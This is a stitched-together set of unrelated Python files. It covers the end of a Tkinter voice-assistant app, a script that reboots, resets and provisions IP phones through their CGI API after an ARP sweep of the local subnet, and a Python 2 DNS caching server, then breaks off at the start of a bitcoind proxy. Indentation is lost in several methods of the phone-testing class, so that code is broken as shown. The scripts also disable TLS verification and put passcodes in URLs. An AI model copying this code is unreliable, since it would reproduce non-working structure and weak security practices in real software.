    robo_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\robot.png")
    dict_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\unnamed.png")
    dict_img=dict_img.subsample(3,3)
    quiz_image=PhotoImage(file=r"D:\Python_files\Python\Project\Images\quizlet_logo_large.png")
    quiz_image=quiz_image.subsample(5,5)
    texttospeach_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\TexttoSpeech.png")
    texttospeach_img=texttospeach_img.subsample(3,3)
    # CONSISTENCY FIX: raw-string prefix added like every other path here
    # (the literal's value is unchanged).
    speachtotext_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\SpeechToText.png")
    speachtotext_img=speachtotext_img.subsample(3,3)
    letstalk_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\letstalklogotransparent.png")
    letstalk_img=letstalk_img.subsample(3,3)
    humatorob_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\high-five.png")
    humatorob_img=humatorob_img.subsample(3,3)
    stop_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\stop.png")
    stop_img=stop_img.subsample(5,5)
    # Title banner, central robot image, and the feature buttons.
    Label(text="Speak Bot",font=myFont,pady=20,padx=800,fg="white",bg="#4c9aed").pack()
    Button(screen1,image=robo_img,bg="#93bfed",bd=0).pack()
    Button(screen1,image=letstalk_img,width=300,height=150,bg="#ddf0ce").place(x=300,y=150)
    Button(screen1,image=dict_img,width=300,height=150,bg="#ddf0ce").place(x=200,y=350)
    Button(screen1,image=quiz_image,width=300,height=150,bg="#ddf0ce").place(x=300,y=550)
    Button(screen1,image=texttospeach_img,width=300,height=150,bg="#ddf0ce").place(x=950,y=150)
    Button(screen1,image=speachtotext_img,width=300,height=150,bg="#ddf0ce").place(x=1000,y=350)
    Button(screen1,image=humatorob_img,width=300,height=150,bg="#ddf0ce").place(x=950,y=550)
    Button(screen1,image=stop_img,width=150,height=100,bg="#ddf0ce").place(x=700,y=680)
    screen1.mainloop()
def quiz_screen(qu,ans,o1,o2,o3):
    """Show the quiz question and four numbered options in a Toplevel window.

    The correct answer is always presented as option 3 (quiz() accepts
    '3'/'three' as the right reply); the other options get labels 1, 2, 4.
    """
    o1='1'+" "+o1
    ans='3'+" "+ans
    o3='2'+" "+o3
    o2='4'+" "+o2
    global screen2
    screen2=Toplevel(screen1)
    screen2.configure(bg="white")
    screen2.title("Quiz")
    screen2.geometry('1920x1080')
    myfont=font.Font(size=20)
    Label(screen2,text=qu,font=myfont).place(x=50,y=300)
    Label(screen2,text=o1).place(x=500,y=450)
    Label(screen2,text=o3).place(x=500,y=500)
    Label(screen2,text=ans).place(x=800,y=450)
    Label(screen2,text=o2).place(x=800,y=500)
def letstalk():
    """Listen for a free-form query, speak the analyser's answer (or a web
    fallback message), then return to the main command loop."""
    speaker.Speak("Say a keyword or ask something")
    text=Operations.operations.getaudiodata()
    text2=Operations.operations.textanalizer(text)
    # BUG FIX: identity comparison with None (was ``text2==None``).
    if text2 is None:
        speaker.Speak("These are the results founded in web")
    else:
        speaker.Speak(text2)
    start()
def dictionary():
    """Speak the dictionary definition of a spoken keyword, then return to
    the main command loop."""
    speaker.Speak("Say a keyword to search")
    # BUG FIX: ``with`` closes the handle; json.load(open(...)) leaked it.
    with open("D:\Python_files\Python\Project\DataBase\Dictionary_data.json") as f:
        data=json.load(f)
    text=Operations.operations.getaudiodata()
    text=text.lower()
    if text in data.keys():
        speaker.Speak(data[text][0])
    else:
        speaker.Speak("Cant find please retry")
    start()
def quiz():
    """Run one spoken multiple-choice round from the Jeopardy question bank;
    recurses into another round on a correct answer, otherwise returns to
    the main command loop."""
    # BUG FIX: ``with`` closes the handle; json.load(open(...)) leaked it.
    with open("D:\Python_files\Python\Project\DataBase\JEOPARDY_QUESTIONS1.json") as f:
        data=json.load(f)
    quest_no=random.randint(0,50)
    qu=data[quest_no]["question"]
    ans=data[quest_no]["answer"]
    # Three distractors drawn from random other questions.
    o1=data[random.randint(0,50)]["answer"]
    o2=data[random.randint(0,50)]["answer"]
    o3=data[random.randint(0,50)]["answer"]
    # Show the options window while the questions are being spoken.
    t2=threading.Thread(target=quiz_screen,args=(qu,ans,o1,o2,o3))
    t2.start()
    speaker.Speak("Lets start Quiz")
    speaker.Speak(qu)
    speaker.Speak(o1)
    speaker.Speak(ans)
    speaker.Speak(o2)
    speaker.Speak(o3)
    speaker.Speak("Say your answer")
    answ=Operations.operations.getaudiodata()
    # The correct answer is always option 3 (see quiz_screen's labelling).
    if answ=='3' or answ=='three' or answ==ans or answ=="number three" or answ=="tree":
        speaker.Speak("Correct answer")
        screen2.destroy()
        quiz()
    else:
        speaker.Speak("Wrong answer")
        screen2.destroy()
        start()
def filetospeech():
    """Read texttospeech.txt aloud, then return to the main command loop."""
    # BUG FIX: the file handle was opened and never closed.
    with open("texttospeech.txt",'r') as f:
        text=f.read()
    speaker.Speak(text)
    start()
def speechtotext():
    """Dictate a phrase and write it to speechtotext.txt, then return to the
    main command loop."""
    speaker.Speak("Say to write")
    # ``with`` replaces the manual open/close pair; the file is opened (and
    # truncated) before listening, matching the original ordering.
    with open("speechtotext.txt",'w') as f:
        text=Operations.operations.getaudiodata()
        f.write(text)
    speaker.Speak("Succesfully written")
    start()
def recordvoice():
    """Record ~3 second snippets until one is recognised, save it to
    changedaudio.wav, then return to the main command loop."""
    flag=1
    speaker.Speak("Say something")
    with sr.Microphone() as source:
        l.adjust_for_ambient_noise(source)
        while flag:
            audio_data=l.record(source,duration=3)
            try:
                text=l.recognize_google(audio_data)
                with open("changedaudio.wav","wb") as f:
                    f.write(audio_data.get_wav_data())
                flag=0
            except Exception:
                # BUG FIX: was a bare ``except:`` that also trapped
                # SystemExit/KeyboardInterrupt; recognition failures land here.
                speaker.Speak("Cant hear any thing")
    speaker.Speak("Data changed and saved")
    start()
def start():
    """Main voice-command loop: keep listening until a known command code
    (1-6) is recognised, dispatch to the matching feature, then close the
    main window."""
    flag=-1
    while flag==-1:
        speaker.Speak("How can I help you")
        text=Operations.operations.getaudiodata()
        flag=Operations.operations.countrolanalizer(text)
    if flag==1:
        letstalk()
    elif flag==2:
        dictionary()
    elif flag==3:
        quiz()
    elif flag==4:
        filetospeech()
    elif flag==5:
        speechtotext()
    elif flag==6:
        recordvoice()
    # NOTE(review): reached only when the chosen feature returns without
    # recursing back into start(); destroys the main window.
    screen1.destroy()
# Run the Tk main loop on a worker thread while the voice loop runs here.
Homepage_t1=threading.Thread(target=homepage)
Homepage_t1.start()
start()
apiTest.py | # -*- coding: utf-8 -*-
import json
import sys
import socket
import requests
import tftpServer
from collections import deque
import time
from scapy.all import *
from threading import Thread
# core dump check
# point out where to save it.
# python check and download file
# python send http / https request
def search_lan_mac(ip):
    """Return the MAC address of ``ip`` found via an ARP scan of its /24,
    or False when no host with that IP answers."""
    # Refresh scapy's routing state before scanning.
    conf.route.resync()
    conf.route.route('0.0.0.0')[0]
    # show_interfaces()
    get_working_if()
    addr = ip.split('.')
    # Broadcast an ARP who-has over the whole /24 the target lives in.
    lan = addr[0] + "." + addr[1] + "." + addr[2] + ".1/24"
    ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=lan), timeout=3, verbose=False)
    for snd, rcv in ans:
        cur_mac = rcv.sprintf("%Ether.src%")
        cur_ip = rcv.sprintf("%ARP.psrc%")
        if cur_ip == ip:
            return cur_mac
    return False
def search_ip(ip, mac):
    """ARP-scan the /24 around *ip* and return the current IP of *mac*.

    Used to re-find a device whose DHCP lease changed; falls back to the
    supplied *ip* when the MAC did not answer.

    Fix: removed a dead write (``ip = cur_ip.strip()`` immediately before
    ``return cur_ip``) that could never affect the result.
    """
    conf.route.resync()
    conf.route.route('0.0.0.0')[0]
    # show_interfaces()
    get_working_if()
    addr = ip.split('.')
    lan = addr[0] + "." + addr[1] + "." + addr[2] + ".1/24"
    ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=lan), timeout=3, verbose=False)
    for snd, rcv in ans:
        cur_mac = rcv.sprintf("%Ether.src%")
        cur_ip = rcv.sprintf("%ARP.psrc%")
        if cur_mac == mac:
            return cur_ip
    return ip
def sendHttpReuqest(url, http):
    """Issue a GET to *url* over http (http=True) or https and return the Response.

    The URL is echoed to stdout with the passcode masked.

    Fixes: ``url.find`` never raises, so the old try/except was dead code,
    and when "passcode=" was absent ``find`` returned -1 and the code
    printed ``url[:-1] + "passcode=*****"`` (a mangled URL). The two
    identical scheme branches were also collapsed into one call.
    """
    pos = url.find("passcode=")
    if pos >= 0:
        print(url[:pos] + "passcode=*****")
    else:
        print(url)
    scheme = "http://" if http else "https://"
    # verify=False: the devices use self-signed certificates
    res = requests.get(scheme + url, verify=False)
    print(res)
    return res
class apiTester():
def __init__(self):
self.ip = ""
self.userName = ""
self.password = ""
self.interval = 100
self.loop = 1
self.testType = "reboot"
self.version1 = ""
self.version1 = ""
self.version1 = ""
self.dir1 = ""
self.dir2 = ""
self.dir3 = ""
self.serverType = 1 # 1 means http
self.mac = ""
self.messageList = deque()
self.errorCount = 0
self.http = True
self.foundCoreStop = False
self.coreDumpPath = ".\\"
self.testStatus = [False,0,0,"ip","mac"]
self.enableAI = False
    def setEnableAI(self, enable):
        # enable: bool — use the camera + CNN to detect device state changes.
        self.enableAI = enable
    def setCNN(self,cnnP):
        # cnnP: CNN wrapper providing predict(); required when enableAI is set.
        self.cnn = cnnP
def setServerType(self,serverType):
if serverType == "tftp":
self.serverType = 0
elif serverType == "http":
self.serverType = 1
elif serverType == "https":
self.serverType = 2
elif serverType == "ftp":
self.serverType = 3
elif serverType == "ftps":
self.serverType = 4
    def setVersion(self,v1,v2,v3,d1,d2,d3):
        # Three firmware versions and their download dirs; provisioning cycles
        # v1 -> v2 -> v3 -> v1 (or just v1 <-> v2 when v3 is empty).
        self.version1 = v1
        self.version2 = v2
        self.version3 = v3
        self.dir1 = d1
        self.dir2 = d2
        self.dir3 = d3
    def setTestStatus(self,status,messageList,path):
        # status: shared [running, loop, countdown, ip, mac] list (UI-owned).
        # messageList: shared deque the UI drains for log output.
        # path: directory where downloaded core dumps are written.
        self.testStatus = status
        self.messageList = messageList
        self.coreDumpPath = path
    def setFoundCoreStop(self,stop):
        # stop: when True, abort the whole run as soon as a core dump is found.
        self.foundCoreStop = stop
    def setValue(self,ip,user,password,interval,loop,testType):
        # Basic connection/test parameters for the device under test.
        self.ip = ip
        self.userName = user
        self.password = password
        self.interval = interval
        self.loop = loop
        self.testType = testType
        #
        # NOTE(review): side effect — every call launches another TFTP server
        # thread for provisioning; calling setValue twice starts two servers.
        t = Thread(target=tftpServer.lauchServer,args=())
        t.start()
    def initPhone(self):
        """GET api-request_init_phone_status; True only on HTTP 200.

        On a connection error the scheme is flipped (http<->https) once and
        the request retried after a 5s wait.
        NOTE(review): self.loop is the configured loop *count*, not the
        current iteration — the loop==0 branches only fire when zero loops
        were configured; confirm intent.
        """
        url = self.ip
        url += "/cgi-bin/api-request_init_phone_status?passcode="
        url += self.password
        try:
            res = sendHttpReuqest(url,self.http)
        except:
            if self.loop == 0:
                # maybe the device only speaks the other scheme
                self.http = not self.http
            try:
                self.checkAndWait(5)
                res = sendHttpReuqest(url,self.http)
            except:
                self.outputMessage("destination unreachable !")
                self.errorCount += 1
                if self.loop == 0:
                    self.testStatus[0] = False
                return False
        if res.status_code == 200:
            self.outputMessage("init phone success")
            return True
        elif res.status_code == 401:
            # wrong password or API remote control disabled on the device
            self.outputMessage("话机 未鉴权,请检查IP地址和密码",1)
            self.testStatus[0] = False
            return False
        elif res.status_code == 500:
            self.outputMessage("device return code:500",1)
            return False
        else:
            return False
    def rebootPhone(self):
        # Fire-and-forget REBOOT request.
        url = self.ip
        url += "/cgi-bin/api-sys_operation?passcode="
        url += self.password + "&request=REBOOT"
        try:
            sendHttpReuqest(url,self.http)
            self.outputMessage("send Reboot API ")
        except:
            self.errorCount += 1
            self.outputMessage("reboot Api connect failed",1)
            # NOTE(review): reconstructed indentation — this wait may have
            # been intended to run on the success path as well; confirm.
            self.checkAndWait(10)
    def resetPhone(self):
        # Factory-reset request; on connect failure wait 10s before moving on.
        url = self.ip
        url += "/cgi-bin/api-sys_operation?passcode="
        url += self.password + "&request=RESET"
        try:
            sendHttpReuqest(url,self.http)
        except:
            self.errorCount += 1
            self.outputMessage("reset Api connect failed",1)
            self.checkAndWait(10)
    def provisionPhone(self):
        # Trigger an immediate provision cycle on the device.
        url = self.ip
        url += "/cgi-bin/api-sys_operation?request=PROV&passcode="
        url += self.password
        try:
            sendHttpReuqest(url,self.http)
        except:
            # it may already in provision status, after config setting change
            # self.outputMessage("provision Api connect failed",1)
            self.checkAndWait(4)
def coreDumpCheckAndDownload(self):
url = self.ip
url += "/cgi-bin/api-download_coredump?passcode=" + self.password
try:
res = sendHttpReuqest(url,self.http) # set stream = True
except:
self.outputMessage("core dump check Api connect failed",1)
self.checkAndWait(10)
return False
if res.status_code == 404:
return False
name = str(res.headers)
pos = name.find("filename")
pos = name.find('"',pos)
end = name.find('"',pos+1)
name = name[pos+1:end]
#download file
with open(self.coreDumpPath + "\\" + name, 'wb') as f:
for data in res.iter_content(1024):
f.write(data)
f.close()
self.outputMessage("found core dump",1)
self.outputMessage(name)
return True
    def getPvalue(self,pvalue):
        """Read one P-value from the device; returns "ERROR" on any failure."""
        url = self.ip
        url += "/cgi-bin/api.values.get?request=" + pvalue
        url += "&passcode=" + self.password
        res = ""
        try:
            res = sendHttpReuqest(url,self.http)
        except:
            # one retry after a short wait
            self.checkAndWait(5)
            try:
                res = sendHttpReuqest(url,self.http)
            except:
                self.outputMessage("get pvalue failed",1)
                return "ERROR"
        if res.status_code != 200:
            self.outputMessage("Response: " + str(res.status_code) , 1)
            return "ERROR"
        try:
            # value = json.load(res.text).get("body").get(pvalue)
            # hand-rolled extraction of  "<pvalue>" : "<value>"  from the JSON text
            pos = res.text.index("\"" + pvalue + "\"" )
            pos = res.text.index(":",pos+1)
            pos = res.text.index("\"",pos+1)
            end = res.text.index("\"",pos+1)
            value = res.text[pos+1:end]
            return value
        except:
            self.outputMessage("get pvalue response format error",1)
            self.outputMessage(res.text,0)
            return "ERROR"
def outputMessage(self,msg,status = 0):
if status == 1:
msg = "<span style=\"color:red\">" + msg + "</span>"
elif status == 2:
msg = "<span style=\"color:blue\">" + msg + "</span>"
else:
msg = "<span style=\"color:black\">" + msg + "</span>"
timeStr = "<span style=\"color:black\">" + time.strftime("[%m-%d %H:%M:%S] ",time.localtime())
msg = timeStr + "</span>" + msg
self.messageList.append(msg)
# print (msg)
def prepareCfgFile(self,serverType,objectDir):
cfgFile = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n"
cfgFile += "<gs_provision version=\"1\">\n"
cfgFile += "<config version=\"1\">\n"
cfgFile += "<P238>0</P238>\n"
cfgFile += "<P6767>" + str(serverType) + "</P6767>\n"
cfgFile += "<P8375>0</P8375>\n"
cfgFile += "<P232></P232>\n"
cfgFile += "<P233></P233>\n"
cfgFile += "<P6768></P6768>\n"
cfgFile += "<P6769></P6769>\n"
cfgFile += "<P192>" + objectDir + "</P192>\n"
cfgFile += "</config>\n"
cfgFile += "</gs_provision>\n"
return cfgFile
    def checkAndWait(self,count):
        """Sleep *count* seconds, updating the UI countdown and honoring stop.

        testStatus[2] is the countdown shown in the UI (only for waits >4s);
        testStatus[0] going False means the user stopped the test.
        """
        self.outputMessage("wait:" + str(count))
        for i in range(count):
            time.sleep(1)
            if count > 4:
                self.testStatus[2] = count - i
            if self.testStatus[0] == False:
                self.testStatus[2] = 0
                break
        self.testStatus[2] = 0
    def activelyWait(self,count,wishLabel):
        """Wait up to *count* seconds for the camera CNN to report *wishLabel*.

        Requires two consecutive confident (>0.6) predictions of the label
        before accepting, to filter single-frame misclassifications.
        Returns True when the device reached the wished state, else False.
        """
        self.outputMessage("max wait:" + str(count))
        ensureCount = 0
        for i in range(count):
            time.sleep(1)
            self.testStatus[2] = count - i
            res, label, acc = self.cnn.predict()
            if self.testStatus[2] > 5:
                # ignore low-confidence frames until the deadline approaches
                if res == False or acc <0.6:
                    continue
            if label == wishLabel and acc >0.6:
                ensureCount += 1
                if ensureCount >= 2:
                    self.outputMessage("status change: " + label, 2)
                    self.checkAndWait(4)
                    self.testStatus[2] = 0
                    return True
            else:
                ensureCount = 0
            if self.testStatus[0] == False:
                # user stopped the test
                self.testStatus[2] = 0
                break
        self.testStatus[2] = 0
        return False
    def updateConfig(self):
        """Point the device's provisioning server at our local TFTP server.

        Determines the local IP by "connecting" a UDP socket toward 8.8.8.8
        (no packet is actually sent), then calls api-provision with
        tftp://host:6699. Returns True on success, False after two failures.
        """
        host = ""
        try:
            # host = socket.gethostbyname(socket.getfqdn(socket.gethostname()[0]))
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(('8.8.8.8', 80))
            host = s.getsockname()[0]
            s.close()
        except:
            self.outputMessage("Get local host ip failed")
            self.errorCount += 1
            return False
        url = self.ip
        url += "/cgi-bin/api-provision?server=tftp://"
        url += host + ":6699"
        url += "&passcode=" + self.password
        try:
            sendHttpReuqest(url,self.http)
            return True
        except:
            # one retry after a short wait
            self.checkAndWait(5)
            try:
                sendHttpReuqest(url,self.http)
                return True
            except:
                self.outputMessage("Set config Api connect failed")
                self.errorCount += 1
                return False
    def executeTestFlow(self):
        """Run the configured Reboot / Reset / Provision test for self.loop
        iterations, tracking progress in the shared testStatus list.

        Aborts when the user clears testStatus[0] or after >5 consecutive
        errors. NOTE(review): testStatus[0] is set True even when the MAC
        lookup failed — confirm whether that is intended.
        """
        var = search_lan_mac(self.ip)
        if var != False:
            self.mac = var
        self.testStatus[0] = True
        self.testStatus[4] = self.mac
        self.errorCount = 0
        successCount = 0
        for i in range(self.loop):
            # the device may have picked up a new DHCP lease; follow its MAC
            ip = search_ip(self.ip,self.mac)
            if ip != self.ip:
                self.outputMessage("update new ip: " + ip,0)
                self.ip = ip
            if self.testStatus[0] == False:
                break
            self.testStatus[1] = i
            self.testStatus[3] = self.ip
            if self.errorCount>5:
                self.testStatus[0] = False
                self.outputMessage("连续失败5-6次,终止测试",2)
                break
            self.outputMessage("-------loop: " + str(i) +" success:" + str(successCount) + "---------",2)
            initResult = self.initPhone()
            if initResult != True:
                if self.errorCount>5 or self.testStatus[0] == False:
                    break
                else:
                    continue
            # always look for (and fetch) a core dump before each operation
            contain = self.coreDumpCheckAndDownload()
            if contain and self.foundCoreStop: # and foundToStops
                self.outputMessage("found core dump stop Test, if you want to continue, please change advance option")
                break
            self.outputMessage("check core Dump finished")
            if self.testStatus[0] == False:
                break
            if self.testType == "Reboot":
                self.rebootPhone()
                # use camera help to check devic status--
                if self.enableAI:
                    res = self.activelyWait(20,"boot")
                    if res == False:
                        self.outputMessage("send reboot api, but device no response (20s)",1)
                        self.errorCount += 1
                        self.outputMessage("start next loop after wait 25s",0)
                        self.checkAndWait(25)
                        continue
                    if self.testStatus[0] == False:
                        break
                    res = self.activelyWait(self.interval,"idle")
                    if res == False:
                        self.outputMessage("device reboot timeout, not back to idle status",1)
                        self.errorCount += 1
                        continue
                    else:
                        self.outputMessage("reboot susccess")
                        #after reboot finished, need wait api setup
                        self.outputMessage("wait for api setup",0)
                        self.checkAndWait(25)
                else:
                    # no camera: just wait the configured interval blindly
                    self.checkAndWait(self.interval)
                    self.outputMessage("reboot susccess")
                successCount += 1
                self.errorCount = 0
            elif self.testType == "Reset": # after reset, api remote control set to disable ?
                self.resetPhone()
                # a factory reset restores the default web password
                self.password = "admin"
                self.checkAndWait(self.interval)
            elif self.testType == "Provision":
                self.outputMessage(" get device version")
                currentVersion = self.getPvalue("68")
                if currentVersion == "ERROR":
                    self.errorCount += 1
                    continue
                self.outputMessage("current version:" + currentVersion)
                # pick the next version in the v1 -> v2 -> v3 -> v1 cycle
                objVersion = self.version1
                objDir = self.dir1
                if self.version3 != "":
                    if self.version1 == currentVersion:
                        objVersion = self.version2
                        objDir = self.dir2
                    elif self.version2 == currentVersion:
                        objVersion = self.version3
                        objDir = self.dir3
                    elif self.version3 == currentVersion:
                        objVersion = self.version1
                        objDir = self.dir1
                else:
                    if objVersion == currentVersion:
                        objVersion = self.version2
                        objDir = self.dir2
                self.outputMessage("start provision...",0)
                self.outputMessage(currentVersion + " -> " + objVersion,0)
                cfgFile = self.prepareCfgFile(self.serverType,objDir)
                prefix = self.getPvalue("P234")
                postfix = self.getPvalue("P235")
                if prefix == "ERROR" or postfix == "ERROR":
                    self.errorCount += 1
                    continue
                # need test it
                macStr = self.mac.replace(":","")
                macStr = macStr.lower()
                fileName = "configXml\\" + prefix + "cfg" + macStr + ".xml" + postfix
                f = open(fileName, "w")
                f.write(cfgFile)
                f.close()
                self.outputMessage("upload config file")
                uploadResult = self.updateConfig()
                if uploadResult == False:
                    self.checkAndWait(10)
                    continue
                # need check angain ? see value change is success. if config failed
                # could reduce waiting time
                # if pvalue set right, this api not neccesy
                self.provisionPhone()
                if self.enableAI:
                    res = self.activelyWait(20,"boot")
                    if res == False:
                        self.outputMessage("send provision api, but device no response",1)
                        self.outputMessage("retry after wait 25s")
                        self.checkAndWait(25)
                        self.errorCount += 1
                        continue
                    res = self.activelyWait(self.interval,"idle")
                    if res == False:
                        self.outputMessage("device provision timeout, device not back to idle",1)
                        self.errorCount += 1
                        continue
                    self.outputMessage("device back to idle, wait for api setup")
                    self.checkAndWait(25)
                else:
                    self.checkAndWait(self.interval)
                if self.testStatus[0] == False:
                    break
                #update Ip than check version is right!
                ip = search_ip(self.ip,self.mac)
                if ip != self.ip:
                    self.outputMessage("update new ip :" + ip,0)
                    self.ip = ip
                    self.testStatus[3] = self.ip
                self.initPhone()
                newVersion = self.getPvalue("68")
                if newVersion != objVersion:
                    self.outputMessage("provision failed, version is not: [" + objVersion + "]",1)
                    self.outputMessage("current version : [" + newVersion + "]",2)
                    self.outputMessage("previous version: [" + currentVersion + "]",0)
                    # target error one time
                    self.errorCount += 1
                    self.outputMessage("check failed reason...")
                    if newVersion == "ERROR":
                        self.outputMessage("interval time maybe too short, or connect device failed")
                    else:
                        checkDir = self.getPvalue("P192")
                        if checkDir != objDir and checkDir != "ERROR":
                            self.outputMessage("config file uploaded failed",1)
                else:
                    self.outputMessage("provsion success")
                    self.errorCount = 0
                    successCount += 1
                #also need update other info.
        self.outputMessage("Test finished",2)
        self.outputMessage("Success Time:" + str(successCount))
        self.testStatus[0] = False
if __name__ == "__main__":
    # NOTE(review): CNN is not imported anywhere in this file — running the
    # script as-is raises NameError; confirm which module provides it.
    cnnP = CNN()
    cnnP.loadModel()
    t = Thread(target=cnnP.openCamera,args=())
    t.start()
    api = apiTester()
    api.setCNN(cnnP)
    # example device + test parameters
    ip = "192.168.92.11"
    passwd = "123"
    username = "admin"
    ptime = 400   # seconds per wait interval
    loop = 5
    v1 = "0.2.13.45"
    v2 = "1.0.11.6"
    v3 = ""
    d1 = "192.168.92.45:8080/0.2.13.45_fw/"
    d2 = "192.168.92.45:8080/1_0_11_6_fw/"
    d3 = ""
    api.setVersion(v1,v2,v3,d1,d2,d3)
    path = ""
    testStatus = [False,0,0,"ip","mac"]
    messageList = deque()
    api.setValue(ip,username,passwd,ptime,loop,"Reboot")
    api.setTestStatus(testStatus,messageList,path)
    api.setFoundCoreStop(False)
    api.setEnableAI(True)
    api.executeTestFlow()
|
asyncdns.py | # request serialization definition
# the first one character decides
# whether it is a submit[s], request[r] or quit[q]
# the next two chars are digits (00-99) giving the length of the domain
# the following is the domain name string, whose length those digits specify
# The last is the type of the dns resolving request, which includes:
# A: rr.A
# If the string is not recognized, then send A request
import adns
import SocketServer
import threading
from multiprocessing import Process, Condition, Event
import socket
import sys
# This is the handler of the request
# This implemented the persistence connection
# A manual shutdown signal has to be sent to the socket
class ThreadedRequestHandler(SocketServer.StreamRequestHandler):
def handle(self):
while True:
try:
data = self.rfile.readline().strip()
except Exception as e:
print e # log exception to terminal
break
request_type = data[0]
if request_type == "s":
self._subHandle(data)
elif request_type == "r":
response = self._reqHandle(data)
try:
self.wfile.write(response)
except Exception:
break
elif request_type == "q":
break
else:
# TODO: Think about this situation
break
try:
self.wfile.write("q\n")
except Exception:
pass
def _subHandle(self, data):
digit = int(data[1:3])
domain = data[3:3+digit]
record_type = data[3+digit:]
# Don't check whether it has been already cached
# because ip could be updated and it doesn't slow down speed much
with self.server._work_indicator:
if record_type == "CNAME":
query = self.server.c.submit(domain, adns.rr.CNAME)
else:
query = self.server.c.submit(domain, adns.rr.A)
self.server.host_cache[query] = domain
self.server._work_indicator.notify()
def _reqHandle(self, data):
digit = int(data[1:3])
domain = data[3:3+digit]
if domain in self.server.ip_cache:
ip = self.server.ip_cache[domain]
else:
ip = ""
digit_length = str(len(ip))
if len(digit_length) == 1:
response = "".join(["0", digit_length, ip, '\n'])
else:
response = "".join([digit_length, ip, '\n'])
return response
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """TCP server whose handlers share the adns state and caches.

    others: (adns state, ip_cache, host_cache, work-indicator condition).
    """
    def __init__(self, server_address, RequestHandlerClass, others):
        SocketServer.TCPServer.__init__(self, server_address,
                                        RequestHandlerClass)
        self.c, self.ip_cache, self.host_cache, self._work_indicator = others
class DnsChecker(Process):
    """Background process running the TCP cache server plus the adns
    completion loop, filling ip_cache as queries resolve.

    flags: optional [Condition, Event, prints] so a parent process can share
    the wakeup condition / stop event and silence the startup banner.
    """
    def __init__(self, host, port, flags=None):
        Process.__init__(self)
        self.adns_state = adns.init()
        self.ip_cache = {}    # domain -> first A/CNAME answer
        self.host_cache = {}  # in-flight adns query -> domain
        # self._workload = threading.Condition()
        self._workload = flags[0] if flags and len(flags) > 0 else \
            threading.Condition()
        self.host = host
        self.port = port
        # self._stop = threading.Event()
        self._stop = flags[1] if flags and len(flags) > 1 else threading.Event()
        self._prints = flags[2] if flags and len(flags) > 2 else True
    def close(self):
        # signal run() to exit, and wake it if it is waiting for work
        self._stop.set()
        with self._workload:
            self._workload.notify()
    def run(self):
        if self._prints:
            print "DNS cache server is running at: %s:%d" % (self.host,
                                                             self.port)
            print "This server uses BIND9 and GNU adns library to resolve dns"
            print "To submit queries," \
                " please use DnsBuffer() function to create a query object"
        self.server = ThreadedTCPServer((self.host, self.port),
                                        ThreadedRequestHandler,
                                        (self.adns_state, self.ip_cache,
                                         self.host_cache, self._workload))
        self.host, self.port = self.server.server_address
        self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True
        self.server_thread.start()
        while not self._stop.is_set():
            with self._workload:
                # drain completed adns queries, then sleep until notified
                while len(self.host_cache) > 0:
                    for query in self.adns_state.completed():
                        ip = query.check()
                        host = self.host_cache[query]
                        del self.host_cache[query]
                        if len(ip[3]) >= 1:
                            self.ip_cache[host] = ip[3][0]
                self._workload.wait()
        self.server.shutdown()
    def __del__(self):
        self.close()
def DnsCacher(host="localhost", port=5436):
    """Spawn a non-daemonic DnsChecker process (quiet mode) and return it."""
    checker = DnsChecker(host, port, [Condition(), Event(), False])
    checker.daemon = False
    checker.start()
    return checker
class DnsRequirer:
    """Client for the DNS cache server over one persistent TCP connection.

    restart: when True, a broken socket is transparently reconnected and
    the failed operation retried once.

    Fix: removed an unreachable ``return None`` after require()'s
    try/except (every path already returns or re-raises).
    """
    def __init__(self, host, port, restart=False):
        self.host = host
        self.port = port
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((self.host, self.port))
        self._restart_flag = restart
    def submit(self, domain, rtype="A"):
        """Queue *domain* for async resolution; False if the name is too long."""
        if len(domain) > 100:
            return False
        digit = str(len(domain))
        # zero-pad the two-digit length field
        if len(digit) == 1:
            request = "".join(["s0", digit, domain, rtype, '\n'])
        else:
            request = "".join(["s", digit, domain, rtype, '\n'])
        try:
            self.socket.sendall(request)
        except socket.error:
            if self._restart_flag:
                self.restart()
                self.socket.sendall(request)
                return True
            else:
                raise
        else:
            return True
    def require(self, domain):
        """Return the cached ip for *domain* ("" if not resolved yet)."""
        if len(domain) > 100:
            return None
        digit = str(len(domain))
        if len(digit) == 1:
            request = "".join(["r0", digit, domain, '\n'])
        else:
            request = "".join(["r", digit, domain, '\n'])
        try:
            return self._requireIP(request)
        except socket.error:
            if self._restart_flag:
                self.restart()
                return self._requireIP(request)
            else:
                raise
    def _requireIP(self, request):
        # response format: two-digit length prefix, then the ip string
        self.socket.sendall(request)
        response = self.socket.recv(1024).strip()
        digit = int(response[0:2])
        ip = response[2:2+digit]
        return ip
    def restart(self):
        """Politely quit and reopen the connection to the server."""
        try:
            self.socket.sendall("q\n")
        except Exception:
            pass
        self.socket.close()
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((self.host, self.port))
    def __del__(self):
        try:
            self.socket.sendall("q\n")
        except Exception:
            pass
        finally:
            self.socket.close()
def DnsBuffer(host="localhost", port=5436):
    """Connect a DnsRequirer client to a running cache server."""
    return DnsRequirer(host, port)
if __name__ == "__main__":
    # Run the cache server in the foreground until interrupted.
    args = sys.argv[1:]
    flags = [Condition(), Event()]
    if len(args) == 2:
        # Fix: argv entries are strings; TCPServer needs an int port, so the
        # old code crashed on a user-supplied port.
        dns_checker = DnsChecker(args[0], int(args[1]), flags)
    else:
        dns_checker = DnsChecker("localhost", 5436, flags)
    dns_checker.daemon = True
    dns_checker.start()
    try:
        dns_checker.join()
    finally:
        # Fix: close() previously ran only after join() returned, so a
        # KeyboardInterrupt left the child without a shutdown signal.
        dns_checker.close()
|
btcproxy.py | """ A bitcoind proxy that allows instrumentation and canned responses
"""
from flask import Flask, request
from bitcoin.rpc import JSONRPCError
